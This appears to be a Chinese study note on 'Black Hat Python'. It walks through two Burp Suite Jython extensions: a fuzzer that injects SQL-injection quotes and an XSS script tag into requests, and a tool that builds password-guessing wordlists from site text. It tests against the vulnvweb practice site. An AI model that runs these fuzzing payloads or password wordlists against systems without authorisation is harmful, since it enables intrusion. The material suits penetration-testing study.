1.下载Jython

在Burpsuite的扩展中配置jython路径

Burp模糊测试

#!/usr/bin/python

#coding=utf-8

# 导入三个类,其中IBurpExtender类是编写扩展工具必须的类,后两个是创建Intruder载荷生成器导入的类

from burp import IBurpExtender

from burp import IIntruderPayloadGeneratorFactory

from burp import IIntruderPayloadGenerator

from java.util import List,ArrayList

import random

#自定义BurpExtender类,继承和扩展IBurpExtender和IIntruderPayloadGeneratorFactory类

class BurpExtender(IBurpExtender,IIntruderPayloadGeneratorFactory):

    """docstring for BurpExtender"""

    def registerExtenderCallbacks(self, callbacks):

        self._callbacks = callbacks

        self._helpers = callbacks.getHelpers()

         #用registerIntruderPayloadGeneratorFactory函数注册BurpExtender类,这样Intruder才能生成攻击载荷

        callbacks.registerIntruderPayloadGeneratorFactory(self)

        return

    #返回载荷生成器的名称

    def getGeneratorName(self):

        return "BHP Payload Generator"

    #接受攻击相关参数,返回IIntruderPayloadGenerator类型的实例

    def createNewInstance(self,attack):

        return BHPFuzzer(self,attack)

# 定义BHPFuzzer类,扩展了IIntruderPayloadGenerator类

# 增加两个变量类max_payload(最大的payload), num_iterations(迭代次数),用于控制模糊测试的次数

class BHPFuzzer(IIntruderPayloadGenerator):

    """docstring for BHPFuzzer"""

    def __init__(self, extender,attack):

        self._extender = extender

        self._helpers = extender._helpers

        self._attack = attack

        self.max_payloads = 10

        self.num_iterations = 0

        return

    #判定是否继续把修改后的请求发送回Burp Intruder,检查模糊测试时迭代的数量是否达到上限

    def hasMorePayloads(self):

        if self.num_iterations == self.max_payloads:

            return False

        else:

            return True

    #接受原始的HTTP负载,current_payload是数组,转化成字符串,传递给模糊测试函数mutate_payload

    def getNextPayload(self,current_payload):

        #转换成字符串

        payload = "".join(chr(x) for x in current_payload)

        #调用简单的变形器对POST请求进行模糊测试

        payload = self.mutate_payload(payload)

        #增加FUZZ的次数

        self.num_iterations += 1

        return payload

    #重置num_iterations

    def reset(self):

        self.num_iterations = 0

        return

    def mutate_payload(self,original_payload):

        #仅生成随机数或者调用一个外部脚本

        picker = random.randint(1,3)

        #在载荷中选取一个随机的偏移量去变形

        offset = random.randint(0,len(original_payload)-1)

        payload = original_payload[:offset]

        #在随机偏移位置插入SQL注入尝试

        if picker == 1:

            payload += "'"

        #插入跨站尝试

        if picker == 2:

            payload += "<script>alert('BHP!');</script>"

        #随机重复原始载荷

        if picker == 3:

            chunk_length = random.randint(len(payload[offset:]),len(payload)-1)

            repeater = random.randint(1,10)

            for i in range(repeater):

                payload += original_payload[offset:offset+chunk_length]

        #添加载荷中剩余的字节

        payload += original_payload[offset:]

        return payload

配置Burp扩展:

看到前面Loaded的勾打上之后就是没什么问题的了,对http://testphp.vulnweb.com进行测试:

利用网站内容生成密码字典

#coding=utf-8

from burp import IBurpExtender

from burp import IContextMenuFactory

from javax.swing import JMenuItem

from java.util import List, ArrayList

from java.net import URL

import re

from datetime import datetime

from HTMLParser import HTMLParser

class TagStripper(HTMLParser):

    """docstring for TagStripper"""

    def __init__(self):

        HTMLParser.__init__(self)

        self.page_text = []

    def handle_data(self,data):

        self.page_text.append(data)

    def handle_comment(self,data):

        self.handle_data(data)

    def strip(self,html):

        self.feed(html)

        return " ".join(self.page_text)

class BurpExtender(IBurpExtender, IContextMenuFactory):

    """docstring for BurpExtender"""

    def registerExtenderCallbacks(self,callbacks):

        self._callbacks = callbacks

        self._helpers = callbacks.getHelpers()

        self.context = None

        self.hosts = set()

        #按部就班

        self.wordlist = set(["password"])

        #建立起我们的扩展工具

        callbacks.setExtensionName("BHP Wordlist")

        callbacks.registerContextMenuFactory(self)

        return

    def createMenuItems(self,context_menu):

        self.context = context_menu

        menu_list = ArrayList()

        menu_list.add(JMenuItem("Create Wordlist",actionPerformed=self.wordlist_menu))

        return menu_list

    def wordlist_menu(self,event):

        #抓取用户点击细节

        http_traffic = self.context.getSelectedMessages()

        for traffic in http_traffic:

            http_service = traffic.getHttpService()

            host = http_service.getHost()

            self.hosts.add(host)

            http_response = traffic.getResponse()

            if http_response:

                self.get_words(http_response)

        self.display_wordlist()

        return

    def get_words(self,http_response):

        headers, body = http_response.tostring().split('\r\n\r\n',1)

        #忽略下一个请求

        if headers.lower().find("content-type: text") == -1:

            return

        tag_stripper = TagStripper()

        page_text = tag_stripper.strip(body)

        words = re.findall("[a-zA-Z]\w{2,}",page_text)

        for word in words:

            #过滤长字符串

            if len(word) <= 12:

                self.wordlist.add(word.lower())

        return

    def mangle(self,word):

        year = datetime.now().year

        suffixes = ["","","!",year]

        mangled = []

        for password in (word,word.capitalize()):

            for suffix in suffixes:

                mangled.append("%s%s"%(password,suffix))

        return mangled

    def display_wordlist(self):

        print "#! comment: BHP Wordlist for site(s) %s"%", ".join(self.hosts)

        for word in sorted(self.wordlist):

            for password in self.mangle(word):

                print password

        return

《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理的更多相关文章

  1. python黑帽子-黑客与渗透测试编程之道(源代码)

    链接: https://pan.baidu.com/s/1i5BnB5V   密码: ak9t

  2. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  3. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  4. 《Python黑帽子:黑客与渗透测试编程之道》 Web攻击

    Web的套接字函数库:urllib2 一开始以urllib2.py命名脚本,在Sublime Text中运行会出错,纠错后发现是重名了,改过来就好: #!/usr/bin/python #coding ...

  5. 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

    窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...

  6. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

  7. 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器

    基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...

  8. 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能

    有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...

  9. 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制

    GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...

随机推荐

  1. 【转】VS2012 中文版转英文版 英文版转中文版 界面语言切换

    [1]下载VS2012的语言包,各种语言包都有,下载对应的即可. 微软官网衔接地址:vs2012 语言包  http://www.microsoft.com/zh-CN/download/detail ...

  2. [freeCodeCamp] solution to HTTP JSON API SERVER passed!

    var http = require('http') var url = require('url') function parsetime (time) { return { hour: time. ...

  3. gis笔记 wms wfs等OGC标准

    WFS 和WMS的区别 WFS是基于地理要素级别的数据共享和数据操作,WFS规范定义了若干基于地理要素(Feature)级别的数据操作接口,并以 HTTP 作为分布式计算平台.通过 WFS服务,客户端 ...

  4. 函数中返回char *类型

    记录一次比较容易引起混淆的地方. #include <stdio.h> char *str(void) { return "nihao\n"; } int main() ...

  5. laravel使用$errors提取错误信息

    1.控制器 2.模板

  6. WebService安全加密

    众所周知,WebService访问API是公开的,知道其URL者均可以研究与调用.那么,在只允许注册用户的WebService应用中,如何确保API访问和通信的安全性呢?本文所指的访问与通信安全性包括 ...

  7. cocos2d-x 3.4版本,videoPlayer和webView上添加sprite等cocos控件

    本帖源于小弟自己在项目过程中为了解决在cocos2d-x中实现ios里videoPlayer自定义控件的需求,所以挖出来大神的一个帖子http://www.cocoachina.com/bbs/rea ...

  8. Android系统root破解原理分析

    http://dengzhangtao.iteye.com/blog/1543494 root破解过程的终极目标是替换掉系统中的su程序.但是要想替换掉系统中su程序本身就是需要root权限的,怎样在 ...

  9. EXCEL 单元格引用问题

    =(SUM(INDIRECT("'2.5酒店预订收入'!"&"J"&MATCH(C21,'2.5酒店预订收入'!B:B,0)&" ...

  10. HDU 2037 今年暑假不AC (区间贪心)

    题意:又是中文题... 析:先说一下区间贪心的一个定理,选择不相交的区间:数轴上有n个开区间(ai, bi).选择尽量多的区间,使得这些区间两两不相交,贪心策略是,一定是选bi小的.(想一下为什么). ...